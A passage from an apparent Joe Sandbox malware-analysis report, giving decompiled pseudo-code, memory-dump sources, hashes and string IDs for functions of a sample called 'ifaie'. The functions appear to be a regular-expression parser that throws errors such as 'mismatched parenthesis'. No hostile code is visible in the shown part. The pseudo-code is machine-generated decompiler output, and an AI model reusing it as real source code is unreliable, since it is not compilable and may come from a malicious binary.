                                                    							 *(_t344 - 4) = 0x12;
                                                    							E00404FA7(_t344 - 0x70, _t344 - 0x48);
                                                    							_push(0x4196f8);
                                                    							_push(_t344 - 0x70);
                                                    							 *((intOrPtr*)(_t344 - 0x70)) = 0x417698;
                                                    							L004153FE();
                                                    						}
                                                    					}
                                                    					_t262 =  *((intOrPtr*)(_t344 - 0x10));
                                                    					if( *(_t344 - 0x38) != 0 &&  *(_t262 + 0x10) == 0) {
                                                    						_t192 = E0040507F( *((intOrPtr*)(_t236 + 4)), 0x10d);
                                                    						 *(_t344 + 8) = _t192;
                                                    						 *(_t344 - 4) = 0x13;
                                                    						if(_t192 == 0) {
                                                    							_t193 = 0;
                                                    							__eflags = 0;
                                                    						} else {
                                                    							_t193 = E004074E9(_t192,  *((intOrPtr*)(_t344 - 0x37)),  *((intOrPtr*)(_t344 - 0x33)),  *((intOrPtr*)(_t344 - 0x2f)));
                                                    						}
                                                    						 *(_t344 - 4) =  *(_t344 - 4) & 0x00000000;
                                                    						_t262 =  *((intOrPtr*)(_t344 - 0x10));
                                                    						 *((intOrPtr*)(_t236 + 0x4f)) = _t193;
                                                    					}
                                                    					_t310 =  *(_t262 + 0x10);
                                                    					if(_t310 != 0xffffffff) {
                                                    						_t335 =  *((intOrPtr*)(_t344 + 0x14));
                                                    						_t126 = _t335 + 4; // 0x405058
                                                    						_t188 =  *_t126;
                                                    						if(_t188 == 0) {
                                                    							L31:
                                                    							 *(_t344 + 8) =  *(_t344 + 8) & 0x00000000;
                                                    							E00407584(_t335, _t325,  *(_t262 + 0x10) + 1, _t344 + 8);
                                                    							_t262 =  *((intOrPtr*)(_t344 - 0x10));
                                                    						} else {
                                                    							_t127 = _t335 + 8; // 0x0
                                                    							_t325 =  *_t127 - _t188 >> 2;
                                                    							if(_t310 >=  *_t127 - _t188 >> 2) {
                                                    								goto L31;
                                                    							}
                                                    						}
                                                    						_t134 = _t335 + 4; // 0x405058
                                                    						 *((intOrPtr*)( *_t134 +  *(_t262 + 0x10) * 4)) = _t262;
                                                    						_t262 =  *((intOrPtr*)(_t344 - 0x10));
                                                    					}
                                                    					_t311 =  *(_t344 - 0x4c);
                                                    					 *(_t344 - 0x34) = _t311;
                                                    					 *((intOrPtr*)(_t344 - 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 - 0x54)))) - _t311;
                                                    					 *((intOrPtr*)( *_t262 + 0x34))(_t344 - 0x34);
                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x10)))) =  *((intOrPtr*)(_t344 - 0x50));
                                                    				}
                                                    				 *(_t344 - 0x14) =  *(_t344 - 0x14) & 0x00000000;
                                                    				 *(_t344 - 4) =  *(_t344 - 4) | 0xffffffff;
                                                    				E00406ED3(_t344 - 0x14);
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t344 - 0xc));
                                                    				return  *((intOrPtr*)(_t344 - 0x10));
                                                    			}



































                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: ExceptionThrowstrlen$H_prolog
                                                    • String ID: Expecting end of comment$Too many alternates in conditional subexpression$bad extension sequence
                                                    • API String ID: 875129476-4221926769
                                                    • Opcode ID: 479213fdc7442555299a49b1fb84c69309523d2a4e49a1813322bbfe5e0f6111
                                                    • Instruction ID: 0d6a007eb94e37c954dd8b579f3e195dca48f335e64544f17c8c6cf0d3b22ef3
                                                    • Opcode Fuzzy Hash: 479213fdc7442555299a49b1fb84c69309523d2a4e49a1813322bbfe5e0f6111
                                                    • Instruction Fuzzy Hash: A6E1A471A0121ADFCF14DF64C890AEEB7B5FF88304F14416EE816A7281DB78AD45CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 23%
                                                    			E004061BE(intOrPtr __ecx) {
                                                    				signed int _t158;
                                                    				signed int _t166;
                                                    				signed int _t178;
                                                    				signed int _t180;
                                                    				signed int _t184;
                                                    				signed int _t185;
                                                    				void* _t190;
                                                    				signed int _t216;
                                                    				void* _t237;
                                                    				signed int _t265;
                                                    				void* _t317;
                                                    				signed int _t320;
                                                    				signed int _t324;
                                                    				void* _t325;
                                                    				void* _t329;
                                                    				void* _t333;
                                                    				signed int _t334;
                                                    				char* _t336;
                                                    				char* _t337;
                                                    				void* _t338;
                                                    				void* _t340;
                                                    				void* _t341;
                                                    				void* _t345;
                                                    
                                                    				L004153D0();
                                                    				_t341 = _t340 - 0x88;
                                                    				_t334 =  *(_t338 + 8);
                                                    				 *((intOrPtr*)(_t338 - 0x24)) = __ecx;
                                                    				 *0x41720c(_t317, _t333, _t237);
                                                    				 *(_t338 + 8) =  *(_t334 + 4);
                                                    				 *((intOrPtr*)(_t338 - 0x20)) =  *((intOrPtr*)(__ecx + 0x13));
                                                    				 *(_t338 - 0x18) = 0;
                                                    				 *(_t338 - 0x14) = 0;
                                                    				 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 0;
                                                    				while(1) {
                                                    					L1:
                                                    					 *(_t338 - 0x10) = 0;
                                                    					while(1) {
                                                    						L2:
                                                    						 *0x41720c();
                                                    						_t158 =  *(_t334 + 4);
                                                    						asm("sbb ecx, ecx");
                                                    						if(( ~_t158 &  *((intOrPtr*)(_t334 + 8)) + _t158) ==  *(_t338 + 8)) {
                                                    							break;
                                                    						}
                                                    						 *0x41720c();
                                                    						asm("sbb ecx, ecx");
                                                    						_t320 = E00406C89(_t338 + 8,  ~( *(_t334 + 4)) &  *((intOrPtr*)(_t334 + 8)) +  *(_t334 + 4));
                                                    						_t345 = _t320 - 0x25;
                                                    						if(_t345 > 0) {
                                                    							__eflags = _t320 - 0x26;
                                                    							if(_t320 == 0x26) {
                                                    								 *0x41720c();
                                                    								_t166 =  *(_t334 + 4);
                                                    								asm("sbb ecx, ecx");
                                                    								__eflags = ( ~_t166 &  *((intOrPtr*)(_t334 + 8)) + _t166) -  *(_t338 + 8);
                                                    								if(( ~_t166 &  *((intOrPtr*)(_t334 + 8)) + _t166) ==  *(_t338 + 8)) {
                                                    									goto L50;
                                                    								} else {
                                                    									__eflags =  *(_t338 - 0x10);
                                                    									if( *(_t338 - 0x10) != 0) {
                                                    										E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x5c,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
                                                    									}
                                                    									 *0x41720c();
                                                    									 *(_t338 + 8) =  *(_t338 + 8) + 1;
                                                    									 *(_t338 - 0x10) = 1;
                                                    									 *(_t338 - 0x14) =  *(_t338 + 8) -  *(_t334 + 4);
                                                    									continue;
                                                    								}
                                                    							} else {
                                                    								__eflags = _t320 - 0x27;
                                                    								if(__eflags == 0) {
                                                    									__eflags =  *(_t338 - 0x10);
                                                    									if( *(_t338 - 0x10) != 0) {
                                                    										E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x30,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
                                                    									}
                                                    									 *0x41720c();
                                                    									_t178 =  *(_t338 + 8);
                                                    									_t265 = _t178 -  *(_t334 + 4);
                                                    									__eflags = _t265;
                                                    									 *(_t338 - 0x14) = _t265;
                                                    									while(1) {
                                                    										 *(_t338 - 0x1c) = _t178;
                                                    										 *0x41720c();
                                                    										_t180 =  *(_t334 + 4);
                                                    										asm("sbb ecx, ecx");
                                                    										__eflags = ( ~_t180 &  *((intOrPtr*)(_t334 + 8)) + _t180) -  *(_t338 + 8);
                                                    										if(( ~_t180 &  *((intOrPtr*)(_t334 + 8)) + _t180) ==  *(_t338 + 8)) {
                                                    											break;
                                                    										}
                                                    										 *0x41720c();
                                                    										asm("sbb ecx, ecx");
                                                    										_t320 = E00406C89(_t338 + 8,  ~( *(_t334 + 4)) &  *((intOrPtr*)(_t334 + 8)) +  *(_t334 + 4));
                                                    										__eflags = _t320;
                                                    										if(_t320 == 0) {
                                                    											_t97 = _t338 + 8;
                                                    											 *_t97 =  *(_t338 + 8) + 1;
                                                    											__eflags =  *_t97;
                                                    											goto L40;
                                                    										} else {
                                                    											__eflags = _t320 - 0x2c;
                                                    											if(_t320 != 0x2c) {
                                                    												L40:
                                                    												_t178 =  *(_t338 + 8);
                                                    												continue;
                                                    											}
                                                    										}
                                                    										break;
                                                    									}
                                                    									 *0x41720c();
                                                    									_t184 =  *(_t338 - 0x1c) -  *(_t338 - 0x14) -  *(_t334 + 4);
                                                    									__eflags = _t184;
                                                    									 *(_t338 - 0x10) = _t184;
                                                    									if(_t184 != 0) {
                                                    										E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
                                                    									}
                                                    									_t185 = 0x2c;
                                                    									__eflags = _t320 - _t185;
                                                    									if(_t320 != _t185) {
                                                    										goto L30;
                                                    									} else {
                                                    										_t272 =  *((intOrPtr*)(_t338 + 0x10));
                                                    										 *(_t338 - 0x14) = _t185;
                                                    										 *(_t338 - 0x18) = 2;
                                                    										_push(_t338 - 0x18);
                                                    										_push( *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)));
                                                    										_t190 = _t338 - 0x44;
                                                    										goto L29;
                                                    									}
                                                    								} else {
                                                    									if(__eflags <= 0) {
                                                    										goto L31;
                                                    									} else {
                                                    										__eflags = _t320 - 0x2c;
                                                    										if(_t320 > 0x2c) {
                                                    											goto L31;
                                                    										} else {
                                                    											__eflags =  *(_t338 - 0x10);
                                                    											if( *(_t338 - 0x10) != 0) {
                                                    												E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x58,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
                                                    											}
                                                    											_t272 =  *((intOrPtr*)(_t338 + 0x10));
                                                    											_push(_t338 - 0x18);
                                                    											 *(_t338 - 0x18) = 2;
                                                    											 *(_t338 - 0x14) = _t320;
                                                    											_push( *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)));
                                                    											_t190 = _t338 - 0x2c;
                                                    											L29:
                                                    											_push(_t190);
                                                    											E00407990(_t272);
                                                    											L30:
                                                    											 *(_t338 - 0x18) = 0;
                                                    											 *0x41720c();
                                                    											 *(_t338 - 0x14) =  *(_t338 + 8) -  *(_t334 + 4);
                                                    											goto L1;
                                                    										}
                                                    									}
                                                    								}
                                                    								goto L54;
                                                    							}
                                                    						} else {
                                                    							if(_t345 == 0) {
                                                    								 *0x41720c();
                                                    								_t324 =  *(_t338 + 8) -  *(_t334 + 4);
                                                    								__eflags =  *(_t338 - 0x10);
                                                    								 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
                                                    								if( *(_t338 - 0x10) != 0) {
                                                    									E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
                                                    								}
                                                    								 *(_t338 - 0x18) = 1;
                                                    								 *(_t338 - 0x14) = 0;
                                                    								goto L21;
                                                    							} else {
                                                    								_t325 = _t320 - 0x22;
                                                    								if(_t325 == 0) {
                                                    									 *0x41720c();
                                                    									asm("sbb ecx, ecx");
                                                    									_t216 = E004090FF(_t338 + 8,  ~( *(_t334 + 4)) &  *((intOrPtr*)(_t334 + 8)) +  *(_t334 + 4),  *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x24)) + 0xf)) - 1);
                                                    									_t341 = _t341 + 0xc;
                                                    									__eflags = _t216;
                                                    									 *(_t338 - 0x1c) = _t216;
                                                    									if(_t216 == 0) {
                                                    										 *((char*)(_t338 - 0x40)) =  *((intOrPtr*)(_t338 + 0x13));
                                                    										 *0x417230(0);
                                                    										_t337 = "invalid backreference in substitution";
                                                    										 *0x417234(_t337, strlen(_t337));
                                                    										 *(_t338 - 4) = 0;
                                                    										E00404FA7(_t338 - 0x78, _t338 - 0x40);
                                                    										_push(0x4196f8);
                                                    										_push(_t338 - 0x78);
                                                    										 *((intOrPtr*)(_t338 - 0x78)) = 0x417698;
                                                    										L004153FE();
                                                    										L50:
                                                    										 *((char*)(_t338 - 0x54)) =  *((intOrPtr*)(_t338 + 0x13));
                                                    										 *0x417230(0);
                                                    										_t336 = "expecting escape sequence in substitution string";
                                                    										 *0x417234(_t336, strlen(_t336));
                                                    										 *(_t338 - 4) = 1;
                                                    										E00404FA7(_t338 - 0x94, _t338 - 0x54);
                                                    										_t158 = _t338 - 0x94;
                                                    										_push(0x4196f8);
                                                    										_push(_t158);
                                                    										 *(_t338 - 0x94) = 0x417698;
                                                    										L004153FE();
                                                    									} else {
                                                    										 *0x41720c();
                                                    										_t324 =  *(_t338 + 8) -  *(_t334 + 4);
                                                    										__eflags =  *(_t338 - 0x10);
                                                    										 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
                                                    										if( *(_t338 - 0x10) != 0) {
                                                    											E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
                                                    										}
                                                    										 *(_t338 - 0x18) = 1;
                                                    										 *(_t338 - 0x14) =  *(_t338 - 0x1c);
                                                    										goto L21;
                                                    									}
                                                    								} else {
                                                    									_t329 = _t325 - 1;
                                                    									if(_t329 == 0) {
                                                    										 *0x41720c();
                                                    										_t324 =  *(_t338 + 8) -  *(_t334 + 4);
                                                    										__eflags =  *(_t338 - 0x10);
                                                    										 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
                                                    										if( *(_t338 - 0x10) != 0) {
                                                    											E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
                                                    										}
                                                    										 *(_t338 - 0x14) =  *(_t338 - 0x14) | 0xffffffff;
                                                    										 *(_t338 - 0x18) = 1;
                                                    										goto L21;
                                                    									} else {
                                                    										if(_t329 != 1) {
                                                    											L31:
                                                    											 *(_t338 - 0x10) =  *(_t338 - 0x10) + 1;
                                                    											 *(_t338 + 8) =  *(_t338 + 8) + 1;
                                                    											continue;
                                                    										} else {
                                                    											 *0x41720c();
                                                    											_t324 =  *(_t338 + 8) -  *(_t334 + 4);
                                                    											 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
                                                    											if( *(_t338 - 0x10) != 0) {
                                                    												E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
                                                    											}
                                                    											 *(_t338 - 0x18) = 1;
                                                    											 *(_t338 - 0x14) = 0xfffffffe;
                                                    											L21:
                                                    											E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
                                                    											 *(_t338 - 0x18) = 0;
                                                    											 *(_t338 - 0x14) = _t324;
                                                    											while(1) {
                                                    												L1:
                                                    												 *(_t338 - 0x10) = 0;
                                                    												goto L2;
                                                    											}
                                                    										}
                                                    									}
                                                    									L54:
                                                    								}
                                                    							}
                                                    						}
                                                    						break;
                                                    					}
                                                    					__eflags =  *(_t338 - 0x10);
                                                    					if( *(_t338 - 0x10) != 0) {
                                                    						_t158 = E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
                                                    					}
                                                    					 *[fs:0x0] =  *((intOrPtr*)(_t338 - 0xc));
                                                    					return _t158;
                                                    					goto L54;
                                                    				}
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: ExceptionThrowstrlen$H_prolog
                                                    • String ID: expecting escape sequence in substitution string$invalid backreference in substitution
                                                    • API String ID: 875129476-967196223
                                                    • Opcode ID: e428f2da547132be2edef280d7813516bedc59247fb0f00e784e4b5edfce4d5d
                                                    • Instruction ID: 3761f46dd23904d97e1b94dca212cf1cba20719bb6d9752a604dd134c7b2255e
                                                    • Opcode Fuzzy Hash: e428f2da547132be2edef280d7813516bedc59247fb0f00e784e4b5edfce4d5d
                                                    • Instruction Fuzzy Hash: 5CE14271A0060ADFCF14DFA8C8949EEBBB5FF44300F11852EE917A7281D778AA45CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 54%
                                                    			E004050B8(intOrPtr __ecx) {
                                                    				signed int _t484;
                                                    				char _t487;
                                                    				intOrPtr _t490;
                                                    				void* _t516;
                                                    				signed int* _t518;
                                                    				signed int _t534;
                                                    				signed int _t535;
                                                    				void* _t560;
                                                    				signed int* _t561;
                                                    				void* _t563;
                                                    				char* _t567;
                                                    				void* _t568;
                                                    
                                                    				L004153D0();
                                                    				_t564 = __ecx;
                                                    				 *(_t568 - 0x24) =  *(_t568 - 0x24) & 0;
                                                    				 *((intOrPtr*)(_t568 - 0x10)) = __ecx;
                                                    				 *(_t568 - 0x20) = 0;
                                                    				 *(_t568 - 0x30) =  *(_t568 - 0x30) & 0;
                                                    				 *(_t568 - 4) = 0;
                                                    				 *((intOrPtr*)(_t568 - 0x2c)) = 0;
                                                    				_t561 =  *(_t568 + 0x10);
                                                    				 *(_t568 - 0x34) =  *(_t568 - 0x34) & 0;
                                                    				_t517 =  *(__ecx + 0x27);
                                                    				 *(_t568 - 4) = 1;
                                                    				 *((char*)(_t568 + 0x13)) = ( *_t561 & 0x00000100) == 0x100;
                                                    				 *0x41720c(_t560, _t563, _t516);
                                                    				_t518 =  *(_t568 + 8);
                                                    				asm("sbb ecx, ecx");
                                                    				if(( ~(( *(__ecx + 0x27))[1]) & _t517[2] + ( *(__ecx + 0x27))[1]) !=  *_t518) {
                                                    					 *(_t568 + 8) =  *(__ecx + 0x27);
                                                    					 *0x41720c();
                                                    					asm("sbb edx, edx");
                                                    					_t484 = E00406B23(_t561, _t518,  ~(( *(_t568 + 8))[1]) & ( *(_t568 + 8))[2] + ( *(_t568 + 8))[1]);
                                                    					__eflags = _t484 - 0x21;
                                                    					if(__eflags > 0) {
                                                    						L18:
                                                    						__eflags =  *(_t568 - 0x20);
                                                    						if( *(_t568 - 0x20) != 0) {
                                                    							_push(_t561);
                                                    							_push( *(_t568 - 0x34));
                                                    							_push(_t518);
                                                    							_push(_t568 - 0x24);
                                                    							E00408D03(_t564);
                                                    							_t490 =  *((intOrPtr*)(_t568 + 0xc));
                                                    							_t534 =  *(_t568 - 0x20);
                                                    							 *(_t568 - 0x24) =  *(_t568 - 0x24) & 0x00000000;
                                                    							 *( *(_t490 + 0x1c)) = _t534;
                                                    							_t535 = _t534 + 4;
                                                    							__eflags = _t535;
                                                    							 *(_t490 + 0x1c) = _t535;
                                                    						}
                                                    						L20:
                                                    						 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
                                                    						E0040C5ED(_t568 - 0x30);
                                                    						_t101 = _t568 - 4;
                                                    						 *_t101 =  *(_t568 - 4) | 0xffffffff;
                                                    						__eflags =  *_t101;
                                                    						E00406ED3(_t568 - 0x24);
                                                    						_t487 = 1;
                                                    						goto L21;
                                                    					}
                                                    					switch( *((intOrPtr*)(_t484 * 4 +  &M00405D48))) {
                                                    						case 0:
                                                    							 *(_t568 + 0x10) =  *(__ecx + 0x27);
                                                    							 *0x41720c();
                                                    							_t492 =  *(_t568 + 0x10);
                                                    							_t537 = _t492[1];
                                                    							asm("sbb edx, edx");
                                                    							__eflags = ( ~_t537 & _t492[2] + _t537) -  *_t518;
                                                    							if(( ~_t537 & _t492[2] + _t537) !=  *_t518) {
                                                    								_push(_t561);
                                                    								_push( *((intOrPtr*)(_t568 + 0xc)));
                                                    								_push(_t518);
                                                    								E00405EEA(__ecx);
                                                    								goto L15;
                                                    							}
                                                    							_t498 =  *((intOrPtr*)(_t568 + 0xc));
                                                    							__eflags =  *(_t498 + 0x10);
                                                    							if( *(_t498 + 0x10) == 0) {
                                                    								goto L10;
                                                    							}
                                                    							_push(0);
                                                    							 *((char*)(_t568 - 0x64)) =  *((intOrPtr*)(_t568 + 0xf));
                                                    							 *0x417230();
                                                    							_t566 = "mismatched parenthesis";
                                                    							_push(strlen(_t566));
                                                    							_push(_t566);
                                                    							 *0x417234();
                                                    							 *(_t568 - 4) = 3;
                                                    							E00404FA7(_t568 - 0x9c, _t568 - 0x64);
                                                    							 *((intOrPtr*)(_t568 - 0x9c)) = 0x417698;
                                                    							_push(0x4196f8);
                                                    							_t505 = _t568 - 0x9c;
                                                    							goto L9;
                                                    						case 1:
                                                    							__ecx = __esi;
                                                    							__eax = E00404705(__ecx, __ebx,  *(__ebp + 0xc), __edi,  *(__ebp + 0x14));
                                                    							__eflags = __eax;
                                                    							_t82 = __eax != 0;
                                                    							__eflags = _t82;
                                                    							__ecx = __ecx & 0xffffff00 | _t82;
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							__eax = E00406ED3(__ecx);
                                                    							 *((char*)(__ebp - 0x34)) = 1;
                                                    							goto L18;
                                                    						case 2:
                                                    							__eax =  *(__ebp + 0xc);
                                                    							__eflags =  *(__eax + 0x10);
                                                    							if( *(__eax + 0x10) != 0) {
                                                    								L10:
                                                    								_t520 = 0;
                                                    								goto L16;
                                                    							}
                                                    							__al =  *((intOrPtr*)(__ebp + 0xf));
                                                    							_push(0);
                                                    							__ecx = __ebp - 0x44;
                                                    							 *(__ebp - 0x44) =  *((intOrPtr*)(__ebp + 0xf));
                                                    							__eax =  *0x417230();
                                                    							__esi = "mismatched parenthesis";
                                                    							__eax = strlen(__esi);
                                                    							_pop(__ecx);
                                                    							_push(__eax);
                                                    							_push(__esi);
                                                    							__ecx = __ebp - 0x44;
                                                    							 *0x417234() = __ebp - 0x44;
                                                    							__ecx = __ebp - 0xd4;
                                                    							 *((char*)(__ebp - 4)) = 4;
                                                    							__eax = E00404FA7(__ecx, __ebp - 0x44);
                                                    							 *(__ebp - 0xd4) = 0x417698;
                                                    							_push(0x4196f8);
                                                    							__eax = __ebp - 0xd4;
                                                    							L9:
                                                    							_push(_t505);
                                                    							L004153FE();
                                                    							goto L10;
                                                    						case 3:
                                                    							__esi =  *(__ebp + 0xc);
                                                    							__ecx = __esi;
                                                    							 *__esi =  *((intOrPtr*)( *__esi + 0x38))();
                                                    							__ecx = __esi[0x1c];
                                                    							 *(__esi[0x1c]) =  *__esi;
                                                    							__ecx = __esi;
                                                    							__eax = E00406F41(__ecx);
                                                    							L15:
                                                    							_t520 = 1;
                                                    							L16:
                                                    							 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
                                                    							E0040C5ED(_t568 - 0x30);
                                                    							 *(_t568 - 4) =  *(_t568 - 4) | 0xffffffff;
                                                    							E00406ED3(_t568 - 0x24);
                                                    							_t487 = _t520;
                                                    							goto L21;
                                                    						case 4:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E00409233( *__edi,  &(__esi[4]));
                                                    							_pop(__ecx);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							_pop(__ecx);
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 5:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E0040927C( *__edi,  &(__esi[4]));
                                                    							_pop(__ecx);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							_pop(__ecx);
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 6:
                                                    							__ecx = __esi[4];
                                                    							__eax = E0040507F(__ecx, 0x40);
                                                    							 *(__ebp + 0x10) = __eax;
                                                    							 *(__ebp + 8) = __eax;
                                                    							__eflags = __eax;
                                                    							 *((char*)(__ebp - 4)) = 5;
                                                    							if(__eax == 0) {
                                                    								__eax = 0;
                                                    								__eflags = 0;
                                                    							} else {
                                                    								__ecx =  *(__ebp + 0x10);
                                                    								__eax =  &(__esi[4]);
                                                    								_push( &(__esi[4]));
                                                    								__eax = E00405DE3(__ecx);
                                                    								__eax =  *(__ebp + 0x10);
                                                    								 *__eax = 0x4177a0;
                                                    							}
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x30;
                                                    							 *((char*)(__ebp - 4)) = 1;
                                                    							__eax = E0040BFD3(__ebp - 0x30, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							__eax = E0040C5ED(__ebp - 0x14);
                                                    							__ecx = __esi[0x27];
                                                    							 *(__ebp + 0x10) = __esi[0x27];
                                                    							__eax =  *0x41720c();
                                                    							__eax =  *(__ebp + 0x10);
                                                    							__ecx =  *(__eax + 4);
                                                    							__eax =  *(__eax + 8);
                                                    							__edx = __ecx;
                                                    							__eax = __eax + __ecx;
                                                    							__edx =  ~__ecx;
                                                    							asm("sbb edx, edx");
                                                    							__edx =  ~__ecx & __eax;
                                                    							__ebp - 0x30 = E004092C5(__ebx, __ebp - 0x30, __ebx, __edx, __edi);
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							_push(__ecx);
                                                    							_push( *__edi);
                                                    							_push( *((intOrPtr*)(__ebp - 0x2c)));
                                                    							__eax = E00409941(__ecx);
                                                    							__esp = __esp + 0x1c;
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							__eax = E00406ED3(__ecx);
                                                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                    							goto L18;
                                                    						case 7:
                                                    							__eax =  *__edi;
                                                    							__ecx =  &(__esi[4]);
                                                    							__eax = E004099FB( *__edi,  &(__esi[4]));
                                                    							_pop(__ecx);
                                                    							 *(__ebp - 0x10) = __eax;
                                                    							_pop(__ecx);
                                                    							__eflags = __eax;
                                                    							__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    							__eax = __ebp - 0x14;
                                                    							 *(__ebp - 0x14) = __cl;
                                                    							__ecx = __ebp - 0x24;
                                                    							__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    							__ecx = __ebp - 0x14;
                                                    							goto L95;
                                                    						case 8:
                                                    							__ecx = __esi[0x27];
                                                    							 *(__ebp + 8) = __esi[0x27];
                                                    							__eax =  *0x41720c();
                                                    							__eax =  *(__ebp + 8);
                                                    							__ecx =  *(__eax + 4);
                                                    							__eax =  *(__eax + 8);
                                                    							__edx = __ecx;
                                                    							__eax = __eax + __ecx;
                                                    							__edx =  ~__ecx;
                                                    							asm("sbb edx, edx");
                                                    							__edx =  ~__ecx & __eax;
                                                    							__eax =  *__ebx;
                                                    							__eflags = __edx - __eax;
                                                    							if(__edx != __eax) {
                                                    								__cl =  *__eax;
                                                    								__eflags = __cl - 0x30;
                                                    								if(__cl < 0x30) {
                                                    									L57:
                                                    									__eflags = __cl - 0x65;
                                                    									if(__cl != 0x65) {
                                                    										__eflags = __cl - 0x78;
                                                    										if(__cl != 0x78) {
                                                    											__eflags = __cl - 0x63;
                                                    											if(__cl != 0x63) {
                                                    												__eflags = __cl - 0x61;
                                                    												if(__cl != 0x61) {
                                                    													L80:
                                                    													__eflags = __cl - 0x66;
                                                    													if(__cl != 0x66) {
                                                    														L83:
                                                    														__eflags = __cl - 0x6e;
